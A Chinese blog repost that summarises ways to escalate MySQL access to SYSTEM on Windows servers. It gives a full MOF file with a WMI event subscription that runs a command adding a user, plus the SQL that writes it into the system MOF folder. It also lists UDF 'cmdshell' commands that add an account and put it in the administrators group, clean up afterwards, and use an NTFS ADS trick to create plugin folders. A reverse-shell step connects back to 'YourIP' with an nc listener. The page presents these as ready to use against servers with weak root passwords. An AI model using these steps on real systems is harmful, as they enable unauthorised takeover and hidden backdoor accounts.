mysql ntfs 提权 (errcode: 22)_mysql提权总结 - osc_cveqtg0x的个人空间 - OSCHINA - 中文开源技术交流社区...

最新推荐文章于 2022-01-15 18:27:53 发布
最新推荐文章于 2022-01-15 18:27:53 发布
阅读量70 收藏
点赞数
文章标签: mysql ntfs 提权 (errcode: 22)
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_33085941/article/details/114329068
版权

一、mof提权

windows管理规范提供了以下三种方法编译到WMI存储库的托管对象格式(MOF)文件:

1、运行MOF文件指定为命令行参数讲Mofcomp.exe文件。

2、使用IMofCompiler接口和$CompileFile方法。

3、拖放到%SystemRoot%\System32\Wbem\MOF文件夹的MOF文件。

Micrsoft建议您到存储库编译MOF文件使用前两种方法。也就是运行Mofcomp.exe文件或使用IMofCompiler:CompileFile方法。

第三种方法仅为后兼容性与早期版本的WMI提供,并因为此功能可能不会提供在将来的版本。

具体到mysql提权中,我们该怎么利用?

1、找一个可写目录上传mof文件,这里我们上传到了C:/wmpub/nullevt.mof,代码如下:

其中第18行,上传前请自己更改。

1 #pragma namespace("\\\\.\\root\\subscription")

2

3 instance of __EventFilter as$EventFilter4 {5 EventNamespace = "Root\\Cimv2";6 Name = "filtP2";7 Query = "Select * From __InstanceModificationEvent"

8 "Where TargetInstance Isa \"Win32_LocalTime\""

9 "And TargetInstance.Second = 5";10 QueryLanguage = "WQL";11 };12

13 instance of ActiveScriptEventConsumer as$Consumer14 {15 Name = "consPCSV2";16 ScriptingEngine = "JScript";17 ScriptText =

18 "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user waitalone waitalone.cn /add\")";19 };20

21 instance of __FilterToConsumerBinding22 {23 Consumer =$Consumer;24 Filter =$EventFilter;25 };

2、执行load_file及into dumpfile把文件导出到正确的位置即可。

1 select load_file('C:/wmpub/nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof'

执行成功后,即可添加一个普通用户,然后可以更改命令,再上传导出执行把用户提升到管理员权限,然后3389连接就可以了。

二、利用UDF提权 功能:利用mysql自定义函数功能,将mysql的账号转化为system权限。 适用场景:1、目标系统是windows(win2000, XP,Win2003);2、拥有MYSQL的某个用户账号,此账号必须有对mysql的insert和delete权限和抛弃函数。 3、首先判断mysql版本,如果大于5.1的话,就直接上传udf.dll到MySQL\Lib\Plugin\文件夹下,一般Lib、Plugin文件夹需要手工建立,mysql路径可以用select @@datadir语句找出。 4、直接执行create function sys_eval returns string soname 'udf.dll',若成功则可直接执行命令。

udf提权也是最常见的提权方式。但是往往再执行过程中老是遇到"Can't open shared library"的情况,这里可以利用NTFS ADS流来解决这个问题。

1、最常见的是直接使用udf.php此类的工具来执行udf提权。

连接mysql以后,先导出udf.dll到c:\windows\system32目录下。

2、创建相应的函数并执行命令,具体如下:

1 create function cmdshell returns string soname 'udf.dll';2 select cmdshell('net user waitalone waitalone.cn /add');3 select cmdshell('net localgroup administrators waitalone /add');4 drop functioncmdshell; 删除函数5 delete from mysql.func where name='cmdshell' 删除函数

3、某些情况下,我们会遇到Can't open shared library的情况,这时就需要我们把udf.dll导出到lib\plugin目录下才可以,但是默默情况下

plugin不存在,怎么办?还好有大牛研究出利用NTFS ADS流来创建文件夹的方法:

select @@basedir;//查找到mysql的目录select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib::$INDEX_ALLOCATION';//利用NTFS ADS创建lib目录select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin::$INDEX_ALLOCATION';//利用NTFS ADS创建plugin目录

执行成功以后再进行导出即可。

三、反弹端口连接提权

假设我们扫到一个mysql的root弱密码,并且可以外连,但是服务器上面的网站又无法getshell,这时我们怎么办?

1、利用mysql客户端工具连接mysql服务器,然后执行下面的操作。(mysql.txt暂时没有)

mysql.exe -h 172.16.10.11 -uroot -p

Enter password:

mysql> \. c:\mysql.txt

mysql>select backshell("YourIP",2010);

2、本地监听你反弹的端口

nc.exe -vv -l -p 2010

成功后,你将获得一个system权限的cmdshell,其实这个也是利用UFDF提权。

周福来
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql ntfs (errcode: 22)_NTFS ADS带来的WEB安全问题
weixin_35837856的博客
02-17 317
如今的文件上传漏洞突破日益困难,各种花式绕过方式也被防御的死死的,但想必NTFS ADS这种在实战中用到的还是相对较少,尤其是它所附带的后门隐藏效果,对于我们在日常渗透中也会有很大助益,这里分享一篇关于此的文章。注:文中图片均可点击放大查看!看不清楚直接点击查看即可!可以看到ADS在很久以前就被一些安全人员所关注,并且也出了一些经典的利用,比如隐藏文件,隐藏webshell(http://blo...
MySQL 启动报错:File ./mysql-bin.index not found (Errcode: 13)
09-10
MySQL数据库在启动时可能会遇到各种错误,其中一种常见的报错是"File ./mysql-bin.index not found (Errcode: 13)"。这个错误通常表明MySQL无法找到它的二进制日志索引文件(mysql-bin.index),并且错误代码13通常...
mysql mmsql 区别_mysql 总结
weixin_42402188的博客
01-27 124
1.MOF简单的说mof就是系统内部的一个程序,每隔一定时间系统就会以root限去执行,我们将其替换然后执行我们的而已攻击代码。此举称之为mof。以下便是脚本:1 #pragma namespace("\\\\.\\root\\subscription")23 instance of __EventFilter as$EventFilter4 {5 EventNamespace ...
mysql errcode 22 myi_Errcode: 17 - File exists
weixin_27058835的博客
01-27 215
#0fill_schema_table_by_open (thd=0x2293ee0,is_show_fields_or_keys=true, table=0x7fbed405c310,schema_table=0x1531980, orig_db_name=0x7fbf00dfea20,orig_table_name=0x7fbf00dfea10,open_tables_state_backup...
mysql ntfs (errcode: 22),PhpMyAdmin UDF 的方法有哪些?
weixin_42440389的博客
03-17 196
适用环境:PhpMyAdmin 3.x+MySQL5.x前条件: 有MYSQL的ROOT限,无Shell ,无法爆绝对路径思路:利用NTFS ADS创建 plugin目录 ---- 导出UDF过程:查询 select @@basedir (或者 select @@datadir)得到MySQL目录 C:\MySql\假如该目录不存在\lib\plugin目录,利用ADS创建查询sele...
mysql errorcode 22_MySQL Error Codes MYSQL的错误代码
weixin_30762363的博客
01-19 908
OS error code 1: Operation not permittedOS error code 2: No such file or directoryOS error code 3: No such processOS error code 4: Interrupted system callOS error code 5: Input/output e...
MySQL4 File ‘c:\mysql\share\charsets\?.conf’ not found (Errcode: 22)的解决方法
12-15
.conf’ not found (Errcode: 22) Character set ‘#33′ is not a compiled character set and is not specified in the ‘c:\mysql\share\charsets\Index’ file 查阅一番后基本可以确定原因为低版本的PHP和高版本...
php mysql Errcode: 28 终极解决方法
01-20
1246200383 and hide = ‘n’ and type=’blog’ ORDER BY date DESC LIMIT 1 Error writing file ‘C:\WINDOWS\TEMP\MY9B6F.tmp’ (Errcode: 28) 解决方法: 1.释放C:\WINDOWS\TEMP\空间 2.因为原表太大,所以查询...
mysql errcode 22 myi_[置頂] MySQL報錯 Errcode:28
weixin_30242741的博客
02-07 142
錯誤信息:A MySQL error was encountered. The message is; Cannot fecch table information.The following error occured:Can't create/write to file'/tmp/#sql_1594_0.MYI'(Errcode:28) 解決方案:1. 看了下具體錯誤代碼mysql> \...
mysql errcode 22 myi_Mysql报错 can't create/write to file '/tmp@sql_1aaf3_0.MYI'(Errcode:13 - Permissi...
weixin_39658619的博客
01-27 195
1.用navicat连接Mysql操作时一直示“can't create/write to file '/tmp@sql_1aaf3_0.MYI'(Errcode:13 - Permission denied)”,但链接其他数据库能正常操作;2.登录服务器用 mysql -u root -p登录时示ERROR 2002 (HY000): Can't connect to local MySQL...
MySQL 数据库导入文件过程(出现ERROR 1046、ERROR22的解决办法)
thhxyg的博客
05-01 1288
这个过程前是已有的.sql文件,现在需要将.sql文件导入MySQL中。 第一步:登录数据库 window键+r 输入:cmd 输入:mysql -u(用户名) -p(密码) 第二步:创建属于自己的表 输入:create database mandike; (此处mandike是表名,也就是要导入的.sql文件的名字) 第三步:打开所创建的表 输入:use mandike; (此处mandi...
mysql导入 error: 22
到点就下班!加屁班!
02-19 5168
mysql> source "C:\Users\Administrator\Documents\Tencent Files\1752031248\FileRec v\www_sea_db.sql" ERROR: Failed to open file '"C:\Users\Administrator\Documents\Tencent Files\1752031248\ FileRecv\
MySQL出现Errcode:28错误示解决办法
TheSongOf101的博客
01-12 1万+
Error code 28: No space left on device
mysql安装出现Errcode: 2 - No such file or directory错误的解决办法
热门推荐
眼睛大没办法的博客
11-30 11万+
前两天由于电脑系统出了点问题重装了一下,好多编程软件和环境变量都需要重新安装配置。今天安装最新的mysql时出现了一个问题,下面是我遇到的问题,如果有人遇到和我一样的情况希望能够帮到你们。PS(本人电脑win10) 我在官网https://dev.mysql.com/downloads/mysql/ 下载的是最新的5.7.20版本的免安装的ZIP文件,如图: 解压后在mysql-5...
mysql导入数据出现Errcode: 2 - No such file or directory错误信息
王亨的博客
09-19 3万+
在导入数据出现这个错误一般是因为地址里面的斜杠使用错误。比如下面 load data local infile 'D:\road.txt'into table roadcd fields terminated by '\t';      我参考许多资料,这里的地址都是使用单斜杠,但我却出现下面的错误信息: oad.txt' not found (Errcode: 2 - No such fil
关于Mysql errno: 22 - Invalid argument Unhandled MySQL errono 1017. Unexpected behaviour possible. 错误
weixin_41696782的博客
01-15 1998
关于Mysql errno: 22 - Invalid argument Unhandled MySQL errono 1017. Unexpected behaviour possible. 错误
mysql errcode 2_mysql安装出现Errcode: 2 - No such file or directory错误的解决办法
最新发布
05-13
Errcode: 2 - No such file or directory 的错误通常是由于 MySQL 在安装或启动时找不到相关文件或目录引起的。解决该问题的步骤如下: 1. 检查 MySQL 配置文件是否存在且路径正确。默认情况下,该文件位于 /etc/my...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值